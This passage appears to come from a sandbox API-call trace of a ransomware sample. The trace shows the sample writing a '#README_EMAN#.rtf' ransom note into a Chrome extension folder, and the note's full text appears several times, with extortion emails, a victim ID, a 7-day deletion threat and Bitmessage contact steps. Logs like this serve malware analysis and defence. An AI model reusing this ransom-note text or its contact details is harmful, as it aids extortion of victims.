wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.102] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.102] CloseHandle (hObject=0x2ec) returned 1 [0291.102] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\#readme_eman#.rtf")) returned 0xffffffff [0291.103] GetLastError () returned 0x2 [0291.103] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd 